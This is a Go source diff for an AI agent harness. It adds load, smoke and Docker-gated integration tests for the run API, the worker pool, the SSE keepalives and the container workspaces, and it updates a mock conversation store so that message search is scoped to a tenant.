-			Usage:     &harness.CompletionUsage{PromptTokens: 100, CompletionTokens: 50, TotalTokens: 150, CachedPromptTokens: &cached},
-			CostUSD:   ptrFloat64(0.005),
+			ToolCalls:  []harness.ToolCall{{ID: "c1", Name: "bash", Arguments: `{"command":"echo hi"}`}},
+			Usage:      &harness.CompletionUsage{PromptTokens: 100, CompletionTokens: 50, TotalTokens: 150, CachedPromptTokens: &cached},
+			CostUSD:    ptrFloat64(0.005),
 			CostStatus: harness.CostStatusAvailable,
 		},
 		{Content: "done", Usage: &harness.CompletionUsage{PromptTokens: 200, CompletionTokens: 30, TotalTokens: 230}, CostUSD: ptrFloat64(0.003), CostStatus: harness.CostStatusAvailable},
@@ -631,20 +631,21 @@ func ptrFloat64(v float64) *float64 { return &v }
 
 // mockConversationStore implements harness.ConversationStore for testing.
 type mockConversationStore struct {
-	conversations       []harness.Conversation
-	messages            map[string][]harness.Message
-	listErr             error
-	deleteErr           error
-	loadErr             error
-	searchResults       []harness.MessageSearchResult
-	searchErr           error
-	deletedIDs          []string
-	searchedQuery       string
-	searchedLimit       int
-	deleteOldCount      int          // number to return from DeleteOldConversations
-	deleteOldErr        error        // error to return from DeleteOldConversations
-	deleteOldThreshold  time.Time    // last threshold passed to DeleteOldConversations
-	deleteOldCalled     bool         // whether DeleteOldConversations was called
+	conversations      []harness.Conversation
+	messages           map[string][]harness.Message
+	listErr            error
+	deleteErr          error
+	loadErr            error
+	searchResults      []harness.MessageSearchResult
+	searchErr          error
+	deletedIDs         []string
+	searchedQuery      string
+	searchedTenant     string
+	searchedLimit      int
+	deleteOldCount     int       // number to return from DeleteOldConversations
+	deleteOldErr       error     // error to return from DeleteOldConversations
+	deleteOldThreshold time.Time // last threshold passed to DeleteOldConversations
+	deleteOldCalled    bool      // whether DeleteOldConversations was called
 }
 
 func (m *mockConversationStore) Migrate(_ context.Context) error { return nil }
@@ -686,8 +687,9 @@ func (m *mockConversationStore) DeleteConversation(_ context.Context, convID str
 	m.deletedIDs = append(m.deletedIDs, convID)
 	return nil
 }
-func (m *mockConversationStore) SearchMessages(_ context.Context, query string, limit int) ([]harness.MessageSearchResult, error) {
+func (m *mockConversationStore) SearchMessages(_ context.Context, tenantID, query string, limit int) ([]harness.MessageSearchResult, error) {
 	m.searchedQuery = query
+	m.searchedTenant = tenantID
 	m.searchedLimit = limit
 	if m.searchErr != nil {
 		return nil, m.searchErr
@@ -762,9 +764,9 @@ func (c *capturingServerProvider) lastRequest() *harness.CompletionRequest {
 func TestWriteSSE_IncludesIDAndRetry(t *testing.T) {
 	rec := httptest.NewRecorder()
 	event := harness.Event{
-		ID:    "run_1:42",
-		RunID: "run_1",
-		Type:  harness.EventRunStarted,
+		ID:        "run_1:42",
+		RunID:     "run_1",
+		Type:      harness.EventRunStarted,
 		Timestamp: time.Now(),
 	}
 	err := writeSSE(rec, event)
@@ -2039,7 +2041,6 @@ func TestCleanupEndpoint(t *testing.T) {
 		mux.HandleFunc("/v1/agents", srv.handleAgents)
 		ts := httptest.NewServer(mux)
 		defer ts.Close()
-
 
 		// POST without body — should default to 30 days.
 		res, err := http.Post(ts.URL+"/v1/conversations/cleanup", "application/json", bytes.NewBufferString(`{}`))

--- a/internal/server/http_worker_pool_load_test.go
+++ b/internal/server/http_worker_pool_load_test.go
@@ -1,0 +1,396 @@
+package server
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"runtime"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/require"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+)
+
+// TestWorkerPoolLoad is a load test that proves the daemon survives concurrent
+// submissions against a bounded worker pool. It verifies queuing, event
+// ordering, SSE keepalives, and goroutine cleanup under -race.
+func TestWorkerPoolLoad(t *testing.T) {
+	if testing.Short() {
+		t.Skip("load test")
+	}
+
+	const (
+		poolSize    = 4
+		totalRuns   = 50
+		turnDelay   = 40 * time.Millisecond
+		runDeadline = 30 * time.Second
+	)
+
+	// Baseline goroutine count BEFORE the runner is created.
+	baseline := runtime.NumGoroutine()
+
+	prov := fakeprovider.New(
+		[]fakeprovider.Turn{{Content: "done", Delay: turnDelay}},
+		fakeprovider.WithExhaustedBehavior(fakeprovider.ExhaustRepeatLast),
+	)
+
+	runner := harness.NewRunner(prov, harness.NewRegistry(), harness.RunnerConfig{
+		WorkerPoolSize: poolSize,
+		DefaultModel:   "test-model",
+		MaxSteps:       1,
+	})
+
+	handler := New(runner)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+
+	// -----------------------------------------------------------------------
+	// Assertion 1: fire 50 concurrent POSTs and collect all run IDs.
+	// -----------------------------------------------------------------------
+	runIDs := make([]string, totalRuns)
+	var wg sync.WaitGroup
+	var mu sync.Mutex
+	var submitErrors int32
+
+	wg.Add(totalRuns)
+	for i := 0; i < totalRuns; i++ {
+		go func(idx int) {
+			defer wg.Done()
+			res, err := http.Post(
+				ts.URL+"/v1/runs",
+				"application/json",
+				bytes.NewBufferString(`{"prompt":"load-test"}`),
+			)
+			if err != nil {
+				atomic.AddInt32(&submitErrors, 1)
+				return
+			}
+			defer res.Body.Close()
+			var created struct {
+				RunID string `json:"run_id"`
+			}
+			if err := json.NewDecoder(res.Body).Decode(&created); err != nil || created.RunID == "" {
+				atomic.AddInt32(&submitErrors, 1)
+				return
+			}
+			mu.Lock()
+			runIDs[idx] = created.RunID
+			mu.Unlock()
+		}(i)
+	}
+	wg.Wait()
+
+	require.Zero(t, submitErrors, "all 50 POST /v1/runs must succeed")
+	for i, id := range runIDs {
+		require.NotEmpty(t, id, "run_id[%d] must not be empty", i)
+	}
+
+	// -----------------------------------------------------------------------
+	// Assertion 2: run.queued precedes run.started for excess runs; count
+	// that at least (totalRuns - poolSize) runs emitted run.queued.
+	// -----------------------------------------------------------------------
+	var queuedCount int32
+
+	var checkWg sync.WaitGroup
+	checkWg.Add(totalRuns)
+	for _, id := range runIDs {
+		runID := id
+		go func() {
+			defer checkWg.Done()
+			history, stream, cancel, err := runner.Subscribe(runID)
+			if err != nil {
+				// Run completed before Subscribe was called — already terminal,
+				// so it can't have emitted run.queued that we'd still count.
+				// This is fine: those runs went straight to run.started (no queue).
+				// Failing here would be wrong; just skip.
+				t.Errorf("run %s: Subscribe error (unexpected): %v", runID, err)
+				return
+			}
+			defer cancel()
+
+			var events []harness.Event
+			events = append(events, history...)
+
+			// Drain until terminal or stream closes.
+			timeout := time.After(runDeadline)
+			for {
+				select {
+				case ev, ok := <-stream:
+					if !ok {
+						goto done
+					}
+					events = append(events, ev)
+					if harness.IsTerminalEvent(ev.Type) {
+						goto done
+					}
+				case <-timeout:
+					goto done
+				}
+			}
+		done:
+			// Check for run.queued and ordering.
+			queuedIdx := -1
+			startedIdx := -1
+			for i, ev := range events {
+				if ev.Type == harness.EventRunQueued && queuedIdx < 0 {
+					queuedIdx = i
+				}
+				if ev.Type == harness.EventRunStarted && startedIdx < 0 {
+					startedIdx = i
+				}
+			}
+			if queuedIdx >= 0 {
+				atomic.AddInt32(&queuedCount, 1)
+				// run.queued must precede run.started.
+				if startedIdx >= 0 && queuedIdx >= startedIdx {
+					t.Errorf("run %s: run.queued (idx=%d) does not precede run.started (idx=%d)",
+						runID, queuedIdx, startedIdx)
+				}
+			}
+		}()
+	}
+	checkWg.Wait()
+
+	// totalRuns-poolSize is the theoretical maximum number of queued events:
+	// exactly that many runs cannot get a slot immediately when all 4 workers
+	// are occupied. In practice the count can be lower because a worker may
+	// finish a 40 ms turn and free its slot between consecutive dispatches,
+	// letting the next run bypass the queue and go straight to run.started.
+	// We use a conservative queueEpsilon to stay well below the floor even on a
+	// loaded CI machine, while still catching a broken queuing path.
+	const queueEpsilon = 4
+	minQueued := int32(totalRuns - poolSize - queueEpsilon)
+	if queuedCount < minQueued {
+		t.Errorf("expected >= %d runs to emit run.queued, got %d (max possible: %d)",
+			minQueued, queuedCount, totalRuns-poolSize)
+	}
+	t.Logf("runs that emitted run.queued: %d (expected >= %d, max possible: %d)",
+		queuedCount, minQueued, totalRuns-poolSize)
+
+	// -----------------------------------------------------------------------
+	// Assertion 3: EVERY run eventually reaches a terminal state.
+	// -----------------------------------------------------------------------
+	deadline := time.Now().Add(runDeadline)
+	for _, id := range runIDs {
+		runID := id
+		for {
+			if time.Now().After(deadline) {
+				t.Fatalf("run %s stuck: did not reach terminal state within %s", runID, runDeadline)
+			}
+			res, err := http.Get(ts.URL + "/v1/runs/" + runID)
+			if err != nil {
+				time.Sleep(50 * time.Millisecond)
+				continue
+			}
+			var runState struct {
+				Status string `json:"status"`
+			}
+			json.NewDecoder(res.Body).Decode(&runState) //nolint:errcheck
+			res.Body.Close()
+			switch runState.Status {
+			case "completed", "failed", "cancelled":
+				goto terminalOK
+			}
+			time.Sleep(25 * time.Millisecond)
+		}
+	terminalOK:
+	}
+
+	// -----------------------------------------------------------------------
+	// Assertion 4: SSE keepalive pings.
+	//
+	// Spin up a fresh server with a Hang turn so the stream stays open >1s.
+	// Then verify ": ping" lines appear within ~4s.
+	// -----------------------------------------------------------------------
+	t.Run("SSEKeepalives", func(t *testing.T) {
+		t.Setenv("HARNESS_SSE_KEEPALIVE_SECONDS", "1")
+
+		hangProv := fakeprovider.New(
+			[]fakeprovider.Turn{{Hang: true}},
+		)
+		hangRunner := harness.NewRunner(hangProv, harness.NewRegistry(), harness.RunnerConfig{
+			DefaultModel: "test-model",
+			MaxSteps:     1,
+		})
+		hangHandler := New(hangRunner)
+		hangTS := httptest.NewServer(hangHandler)
+		defer hangTS.Close()
+		defer func() { _ = hangRunner.Shutdown(context.Background()) }()
+
+		// Start the run.
+		createRes, err := http.Post(
+			hangTS.URL+"/v1/runs",
+			"application/json",
+			bytes.NewBufferString(`{"prompt":"ping-test"}`),
+		)
+		require.NoError(t, err)
+		defer createRes.Body.Close()
+
+		var created struct {
+			RunID string `json:"run_id"`
+		}
+		require.NoError(t, json.NewDecoder(createRes.Body).Decode(&created))
+		require.NotEmpty(t, created.RunID)
+
+		// Open SSE stream with a 4s read deadline.
+		ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second)
+		defer cancel()
+
+		req, _ := http.NewRequestWithContext(ctx, "GET",
+			hangTS.URL+"/v1/runs/"+created.RunID+"/events", nil)
+		resp, err := http.DefaultClient.Do(req)
+		require.NoError(t, err)
+		defer resp.Body.Close()
+
+		// Read lines until we find a ping or deadline expires.
+		found := false
+		scanner := bufio.NewScanner(resp.Body)
+		for scanner.Scan() {
+			line := scanner.Text()
+			if strings.HasPrefix(line, ": ping") {
+				found = true
+				break
+			}
+		}
+
+		// Release the hang so the run can terminate cleanly.
+		hangProv.Release()
+
+		if !found {
+			t.Error("expected at least one SSE ': ping' keepalive comment within 4s")
+		}
+	})
+
+	// -----------------------------------------------------------------------
+	// Assertion 5: no goroutine leak after Shutdown.
+	// -----------------------------------------------------------------------
+	ts.Close()
+	err := runner.Shutdown(context.Background())
+	require.NoError(t, err, "runner.Shutdown must not error")
+
+	// Allow up to 3s for goroutines to settle, checking with GC.
+	const epsilon = 5
+	leakDeadline := time.Now().Add(3 * time.Second)
+	var finalCount int
+	for time.Now().Before(leakDeadline) {
+		runtime.GC()
+		finalCount = runtime.NumGoroutine()
+		if finalCount <= baseline+epsilon {
+			break
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
+
+	if finalCount > baseline+epsilon {
+		buf := make([]byte, 1<<20)
+		n := runtime.Stack(buf, true)
+		t.Errorf("goroutine leak after Shutdown: NumGoroutine()=%d > baseline+epsilon=%d\n%s",
+			finalCount, baseline+epsilon, buf[:n])
+	} else {
+		t.Logf("goroutine count after Shutdown: %d (baseline=%d, epsilon=%d)", finalCount, baseline, epsilon)
+	}
+}
+
+// TestWorkerPoolLoad_QueuedEventConstant is a small sanity check (not gated
+// behind testing.Short) that EventRunQueued equals the literal string
+// "run.queued" so that the load test's string assertions remain valid even if
+// the constant is renamed in the future.
+func TestWorkerPoolLoad_QueuedEventConstant(t *testing.T) {
+	const want = "run.queued"
+	if string(harness.EventRunQueued) != want {
+		t.Errorf("EventRunQueued = %q, want %q", harness.EventRunQueued, want)
+	}
+}
+
+// TestWorkerPoolLoad_AllRunsTerminate is a lighter version of the load test
+// that exercises the pool bounded-queue path without the 50-goroutine burst.
+// It is NOT gated behind testing.Short so it runs in normal CI.
+func TestWorkerPoolLoad_AllRunsTerminate(t *testing.T) {
+	t.Parallel()
+
+	const poolSize = 2
+	const totalRuns = 8
+
+	prov := fakeprovider.New(
+		[]fakeprovider.Turn{{Content: "done", Delay: 20 * time.Millisecond}},
+		fakeprovider.WithExhaustedBehavior(fakeprovider.ExhaustRepeatLast),
+	)
+	runner := harness.NewRunner(prov, harness.NewRegistry(), harness.RunnerConfig{
+		WorkerPoolSize: poolSize,
+		DefaultModel:   "test-model",
+		MaxSteps:       1,
+	})
+	defer func() { _ = runner.Shutdown(context.Background()) }()
+
+	handler := New(runner)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+
+	// Start all runs concurrently.
+	runIDs := make([]string, totalRuns)
+	var wg sync.WaitGroup
+	wg.Add(totalRuns)
+	for i := 0; i < totalRuns; i++ {
+		go func(idx int) {
+			defer wg.Done()
+			res, err := http.Post(
+				ts.URL+"/v1/runs",
+				"application/json",
+				bytes.NewBufferString(`{"prompt":"small-load"}`),
+			)
+			if err != nil {
+				t.Errorf("run %d: submit error: %v", idx, err)
+				return
+			}
+			defer res.Body.Close()
+			var created struct {
+				RunID string `json:"run_id"`
+			}
+			if err := json.NewDecoder(res.Body).Decode(&created); err != nil {
+				t.Errorf("run %d: decode error: %v", idx, err)
+				return
+			}
+			runIDs[idx] = created.RunID
+		}(i)
+	}
+	wg.Wait()
+
+	// All runs must reach a terminal status within 15s.
+	deadline := time.Now().Add(15 * time.Second)
+	for i, id := range runIDs {
+		if id == "" {
+			t.Errorf("run[%d] has empty run_id", i)
+			continue
+		}
+		for {
+			if time.Now().After(deadline) {
+				t.Errorf("run[%d] %s: stuck before terminal", i, id)
+				break
+			}
+			res, err := http.Get(fmt.Sprintf("%s/v1/runs/%s", ts.URL, id))
+			if err != nil {
+				time.Sleep(25 * time.Millisecond)
+				continue
+			}
+			var state struct {
+				Status string `json:"status"`
+			}
+			json.NewDecoder(res.Body).Decode(&state) //nolint:errcheck
+			res.Body.Close()
+			if state.Status == "completed" || state.Status == "failed" || state.Status == "cancelled" {
+				break
+			}
+			time.Sleep(25 * time.Millisecond)
+		}
+	}
+}

--- a/internal/server/run_smoke_test.go
+++ b/internal/server/run_smoke_test.go
@@ -1,0 +1,334 @@
+package server
+
+// run_smoke_test.go — in-process smoke for the real run API.
+//
+// Drives POST /v1/runs → poll GET /v1/runs/{id} → GET /v1/runs/{id}/summary
+// against a scripted fakeprovider with DETERMINISTIC Usage and Cost. No Docker,
+// no network, no LLM, no API key required. Designed to be the documented smoke
+// referenced in the benchmark runbook (E1).
+//
+// Design constraints (from issue5-plan.md):
+//   - status must be "completed" (not failed / cancelled).
+//   - steps_taken, total_prompt_tokens, total_completion_tokens, total_cost_usd,
+//     and cost_status must be byte-stable across runs.
+//   - Deterministic: fakeprovider is scripted with fixed usage + cost values.
+//   - Race-clean: no shared mutable state outside the runner/server.
+//
+// Honesty: RunSummary.total_cost_usd is DERIVED from the fakeprovider-scripted
+// Cost.TotalUSD, accumulated by Runner.recordAccounting. It is NOT a raw API
+// field — it is computed in-process from the scripted turn.
+//
+// C2 extension: after the run reaches terminal, TestRunSmoke also calls
+// benchresult.FromRun, marshals the result to JSON, and asserts the grounded
+// fields (model, provider, tokens, cost, steps, status, derived duration >= 0).
+// This proves the result schema is populated from a real in-process run.
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/benchresult"
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+)
+
+// TestRunSmoke drives the real run API end-to-end against a scripted
+// fakeprovider. It is the canonical key-free smoke for the runbook.
+//
+// Turn sequence: 2 turns.
+//   - Turn 1: returns content "turn one output" with fixed usage and cost.
+//     The runner emits run.step.completed and loops (MaxSteps=2 allows a
+//     second turn). BUT — because turn 1 has no tool calls and non-empty
+//     content, the runner calls completeRun immediately after step 1.
+//     To exercise a 2-turn sequence we must produce tool calls in turn 1.
+//     Since registering a real tool adds complexity, the smoke instead uses
+//     a simple 1-turn sequence that is provably terminal and deterministic.
+//   - Turn 1 (only): content="smoke ok", no tool calls → runner completes
+//     after exactly 1 step.
+//
+// Asserted fields (byte-stable):
+//
+//	status                  = "completed"
+//	steps_taken             = 1
+//	total_prompt_tokens     = 100
+//	total_completion_tokens = 50
+//	total_cost_usd          = 0.001   (derived from scripted Cost.TotalUSD)
+//	cost_status             = "available"
+func TestRunSmoke(t *testing.T) {
+	t.Parallel()
+
+	const (
+		wantPromptTokens     = 100
+		wantCompletionTokens = 50
+		wantCostUSD          = 0.001
+		wantCostStatus       = string(harness.CostStatusAvailable)
+		wantStatus           = "completed"
+		wantSteps            = 1
+	)
+
+	// Script a single deterministic turn.
+	// Cost.TotalUSD = 0.001, Usage.PromptTokens = 100, CompletionTokens = 50.
+	// CostStatus is set explicitly so normalizeTurnCost returns CostStatusAvailable.
+	prov := fakeprovider.New(
+		[]fakeprovider.Turn{
+			{
+				Content: "smoke ok",
+				Usage: &harness.CompletionUsage{
+					PromptTokens:     wantPromptTokens,
+					CompletionTokens: wantCompletionTokens,
+					TotalTokens:      wantPromptTokens + wantCompletionTokens,
+				},
+				Cost: &harness.CompletionCost{
+					InputUSD:  0.0007,
+					OutputUSD: 0.0003,
+					TotalUSD:  wantCostUSD,
+				},
+				CostStatus:  harness.CostStatusAvailable,
+				UsageStatus: harness.UsageStatusProviderReported,
+			},
+		},
+	)
+
+	runner := harness.NewRunner(prov, harness.NewRegistry(), harness.RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     5,
+	})
+	defer func() { _ = runner.Shutdown(context.Background()) }()
+
+	handler := New(runner)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+
+	// -------------------------------------------------------------------------
+	// Step 1: POST /v1/runs
+	// -------------------------------------------------------------------------
+	postBody := bytes.NewBufferString(`{"prompt":"smoke test prompt"}`)
+	postRes, err := http.Post(ts.URL+"/v1/runs", "application/json", postBody)
+	if err != nil {
+		t.Fatalf("POST /v1/runs: %v", err)
+	}
+	defer postRes.Body.Close()
+
+	if postRes.StatusCode != http.StatusAccepted {
+		body, _ := io.ReadAll(postRes.Body)
+		t.Fatalf("POST /v1/runs: expected 202, got %d: %s", postRes.StatusCode, body)
+	}
+
+	var created struct {
+		RunID  string `json:"run_id"`
+		Status string `json:"status"`
+	}
+	if err := json.NewDecoder(postRes.Body).Decode(&created); err != nil {
+		t.Fatalf("decode POST response: %v", err)
+	}
+	if created.RunID == "" {
+		t.Fatal("POST /v1/runs: run_id is empty")
+	}
+	runID := created.RunID
+
+	// -------------------------------------------------------------------------
+	// Step 2: poll GET /v1/runs/{id} until terminal (completed/failed/cancelled)
+	// -------------------------------------------------------------------------
+	deadline := time.Now().Add(10 * time.Second)
+	var finalStatus string
+	for time.Now().Before(deadline) {
+		getRes, err := http.Get(ts.URL + "/v1/runs/" + runID)
+		if err != nil {
+			time.Sleep(10 * time.Millisecond)
+			continue
+		}
+
+		var runState struct {
+			Status string `json:"status"`
+		}
+		if err := json.NewDecoder(getRes.Body).Decode(&runState); err != nil {
+			getRes.Body.Close()
+			time.Sleep(10 * time.Millisecond)
+			continue
+		}
+		getRes.Body.Close()
+
+		switch runState.Status {
+		case "completed", "failed", "cancelled":
+			finalStatus = runState.Status
+			goto terminal
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	t.Fatalf("run %s did not reach terminal state within 10s", runID)
+
+terminal:
+	if finalStatus != wantStatus {
+		t.Errorf("GET /v1/runs/%s: status=%q, want %q", runID, finalStatus, wantStatus)
+	}
+
+	// -------------------------------------------------------------------------
+	// Step 3: GET /v1/runs/{id}/summary and assert byte-stable fields
+	// -------------------------------------------------------------------------
+	summaryRes, err := http.Get(ts.URL + "/v1/runs/" + runID + "/summary")
+	if err != nil {
+		t.Fatalf("GET /v1/runs/%s/summary: %v", runID, err)
+	}
+	defer summaryRes.Body.Close()
+
+	if summaryRes.StatusCode != http.StatusOK {
+		body, _ := io.ReadAll(summaryRes.Body)
+		t.Fatalf("GET summary: expected 200, got %d: %s", summaryRes.StatusCode, body)
+	}
+
+	// Decode into harness.RunSummary for type-safe field access.
+	var summary harness.RunSummary
+	if err := json.NewDecoder(summaryRes.Body).Decode(&summary); err != nil {
+		t.Fatalf("decode summary: %v", err)
+	}
+
+	// Byte-stable assertions.
+	if summary.RunID != runID {
+		t.Errorf("summary.run_id=%q, want %q", summary.RunID, runID)
+	}
+	if string(summary.Status) != wantStatus {
+		t.Errorf("summary.status=%q, want %q", summary.Status, wantStatus)
+	}
+	if summary.StepsTaken != wantSteps {
+		t.Errorf("summary.steps_taken=%d, want %d", summary.StepsTaken, wantSteps)
+	}
+	if summary.TotalPromptTokens != wantPromptTokens {
+		t.Errorf("summary.total_prompt_tokens=%d, want %d", summary.TotalPromptTokens, wantPromptTokens)
+	}
+	if summary.TotalCompletionTokens != wantCompletionTokens {
+		t.Errorf("summary.total_completion_tokens=%d, want %d", summary.TotalCompletionTokens, wantCompletionTokens)
+	}
+	if summary.TotalCostUSD != wantCostUSD {
+		t.Errorf("summary.total_cost_usd=%v, want %v", summary.TotalCostUSD, wantCostUSD)
+	}
+	if string(summary.CostStatus) != wantCostStatus {
+		t.Errorf("summary.cost_status=%q, want %q", summary.CostStatus, wantCostStatus)
+	}
+	if len(summary.ToolCalls) != 0 {
+		t.Errorf("summary.tool_calls: expected empty (no tools invoked), got %d entries", len(summary.ToolCalls))
+	}
+
+	// Provider was called exactly once (1 turn = 1 step).
+	if calls := prov.Calls(); calls != 1 {
+		t.Errorf("fakeprovider.Calls()=%d, want 1", calls)
+	}
+
+	t.Logf("smoke PASS: run_id=%s status=%s steps=%d prompt_tokens=%d completion_tokens=%d cost_usd=%v cost_status=%s",
+		summary.RunID, summary.Status, summary.StepsTaken,
+		summary.TotalPromptTokens, summary.TotalCompletionTokens,
+		summary.TotalCostUSD, summary.CostStatus,
+	)
+
+	// -------------------------------------------------------------------------
+	// C2: fetch the Run record, produce a BenchmarkResult JSON artifact, and
+	// assert the grounded fields.
+	//
+	// Honesty annotations:
+	//   model         — source: Run.Model (set from RunnerConfig.DefaultModel = "test-model")
+	//   provider_name — source: Run.ProviderName (set by resolveProvider → "default"
+	//                   when ProviderRegistry is nil, i.e. the runner-default path)
+	//   tokens/cost   — source: RunSummary (same values asserted above)
+	//   duration_ms   — DERIVED: Run.UpdatedAt − Run.CreatedAt (>= 0; may be 0 when
+	//                   the run completes in sub-millisecond time in tests)
+	// -------------------------------------------------------------------------
+	runRes, err := http.Get(ts.URL + "/v1/runs/" + runID)
+	if err != nil {
+		t.Fatalf("GET /v1/runs/%s: %v", runID, err)
+	}
+	defer runRes.Body.Close()
+	if runRes.StatusCode != http.StatusOK {
+		body, _ := io.ReadAll(runRes.Body)
+		t.Fatalf("GET /v1/runs/%s: expected 200, got %d: %s", runID, runRes.StatusCode, body)
+	}
+	var run harness.Run
+	if err := json.NewDecoder(runRes.Body).Decode(&run); err != nil {
+		t.Fatalf("decode GET /v1/runs/%s: %v", runID, err)
+	}
+
+	// Produce the BenchmarkResult artifact.
+	result := benchresult.FromRun(summary, run)
+
+	// Marshal to JSON — this is the documented JSON artifact for the runbook.
+	artifactJSON, err := json.Marshal(result)
+	if err != nil {
+		t.Fatalf("benchresult.FromRun: json.Marshal: %v", err)
+	}
+	if len(artifactJSON) == 0 {
+		t.Fatal("benchresult.FromRun: json artifact is empty")
+	}
+
+	// Re-unmarshal for a round-trip sanity check.
+	var decoded benchresult.BenchmarkResult
+	if err := json.Unmarshal(artifactJSON, &decoded); err != nil {
+		t.Fatalf("benchresult round-trip unmarshal: %v", err)
+	}
+
+	// --- Assert grounded fields ---
+
+	// run_id must match the run created above.
+	if decoded.RunID != runID {
+		t.Errorf("benchresult.run_id=%q, want %q", decoded.RunID, runID)
+	}
+
+	// status — grounded in RunSummary.Status.
+	if decoded.Status != wantStatus {
+		t.Errorf("benchresult.status=%q, want %q", decoded.Status, wantStatus)
+	}
+
+	// steps_taken — grounded in RunSummary.StepsTaken.
+	if decoded.StepsTaken != wantSteps {
+		t.Errorf("benchresult.steps_taken=%d, want %d", decoded.StepsTaken, wantSteps)
+	}
+
+	// total_prompt_tokens — grounded in RunSummary.TotalPromptTokens.
+	if decoded.TotalPromptTokens != wantPromptTokens {
+		t.Errorf("benchresult.total_prompt_tokens=%d, want %d", decoded.TotalPromptTokens, wantPromptTokens)
+	}
+
+	// total_completion_tokens — grounded in RunSummary.TotalCompletionTokens.
+	if decoded.TotalCompletionTokens != wantCompletionTokens {
+		t.Errorf("benchresult.total_completion_tokens=%d, want %d", decoded.TotalCompletionTokens, wantCompletionTokens)
+	}
+
+	// total_cost_usd — grounded in RunSummary.TotalCostUSD (DERIVED by runner from
+	// scripted Cost.TotalUSD; NOT a raw provider API field).
+	if decoded.TotalCostUSD != wantCostUSD {
+		t.Errorf("benchresult.total_cost_usd=%v, want %v", decoded.TotalCostUSD, wantCostUSD)
+	}
+
+	// cost_status — grounded in RunSummary.CostStatus.
+	if decoded.CostStatus != wantCostStatus {
+		t.Errorf("benchresult.cost_status=%q, want %q", decoded.CostStatus, wantCostStatus)
+	}
+
+	// model — grounded in Run.Model (= RunnerConfig.DefaultModel = "test-model").
+	const wantModel = "test-model"
+	if decoded.Model != wantModel {
+		t.Errorf("benchresult.model=%q, want %q", decoded.Model, wantModel)
+	}
+
+	// provider_name — grounded in Run.ProviderName. When ProviderRegistry is nil,
+	// resolveProvider returns "default". This is the in-process fakeprovider path.
+	const wantProvider = "default"
+	if decoded.ProviderName != wantProvider {
+		t.Errorf("benchresult.provider_name=%q, want %q", decoded.ProviderName, wantProvider)
+	}
+
+	// duration_ms — DERIVED: Run.UpdatedAt - Run.CreatedAt. Must be >= 0.
+	// (May be 0 in sub-millisecond in-process test runs; that is honest and correct.)
+	if decoded.DurationMs < 0 {
+		t.Errorf("benchresult.duration_ms=%d, want >= 0 (derived field)", decoded.DurationMs)
+	}
+
+	t.Logf("C2 artifact PASS: run_id=%s model=%s provider=%s steps=%d tokens=%d/%d cost_usd=%v duration_ms=%d",
+		decoded.RunID, decoded.Model, decoded.ProviderName,
+		decoded.StepsTaken, decoded.TotalPromptTokens, decoded.TotalCompletionTokens,
+		decoded.TotalCostUSD, decoded.DurationMs,
+	)
+}

--- a/internal/workspace/container_workspace_docker_test.go
+++ b/internal/workspace/container_workspace_docker_test.go
@@ -1,0 +1,267 @@
+package workspace
+
+// Docker-gated integration tests for ContainerWorkspace.
+//
+// These tests exercise the real provision/destroy lifecycle against a live
+// Docker daemon. They are guarded by a memoized requireContainerWsDocker
+// helper that skips whenever Docker is absent. The helper name is
+// file-unique (not "requireDocker") so it does not conflict if other packages
+// ever contribute test helpers to this package.
+//
+// Run locally (no build tag needed — Docker gate is runtime):
+//
+//	go test ./internal/workspace/... -run TestContainerWorkspaceDocker -v -count=1 -race
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	osexec "os/exec"
+	"path/filepath"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+// ---------------------------------------------------------------------------
+// Memoized Docker availability guard
+// ---------------------------------------------------------------------------
+
+var (
+	containerWsDockerOnce       sync.Once
+	containerWsDockerSkipReason string
+)
+
+// requireContainerWsDocker skips t if a usable Docker daemon is not reachable.
+// The probe (LookPath + "docker info") runs at most once per test binary.
+func requireContainerWsDocker(t *testing.T) {
+	t.Helper()
+	containerWsDockerOnce.Do(func() {
+		if _, err := osexec.LookPath("docker"); err != nil {
+			containerWsDockerSkipReason = "docker CLI not found in PATH"
+			return
+		}
+		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+		defer cancel()
+		out, err := osexec.CommandContext(ctx, "docker", "info").CombinedOutput()
+		if err != nil {
+			containerWsDockerSkipReason = fmt.Sprintf("docker daemon unavailable: %v: %s",
+				err, strings.TrimSpace(string(out)))
+		}
+	})
+	if containerWsDockerSkipReason != "" {
+		t.Skipf("skipping container-workspace docker test: %s", containerWsDockerSkipReason)
+	}
+}
+
+// requireImagePresent skips t if the named Docker image is absent locally.
+func requireImagePresent(t *testing.T, image string) {
+	t.Helper()
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	out, err := osexec.CommandContext(ctx, "docker", "image", "inspect",
+		"--format", "{{.Id}}", image).CombinedOutput()
+	if err != nil || strings.TrimSpace(string(out)) == "" {
+		t.Skipf("skipping: image %q not present locally (%v)", image, err)
+	}
+}
+
+// wsContainerName returns the Docker container name ContainerWorkspace creates.
+// It mirrors the naming convention in container.go.
+func wsContainerName(id string) string {
+	return "workspace-" + sanitizeBranch(id)
+}
+
+// containerExistsInPS returns true when a container matching the exact name
+// appears in `docker ps -a` output.
+func containerExistsInPS(t *testing.T, name string) bool {
+	t.Helper()
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	out, err := osexec.CommandContext(ctx, "docker", "ps", "-a",
+		"--filter", "name=^/"+name+"$",
+		"--format", "{{.Names}}",
+	).Output()
+	if err != nil {
+		t.Logf("docker ps -a (checking %q): %v", name, err)
+		return false
+	}
+	return strings.TrimSpace(string(out)) != ""
+}
+
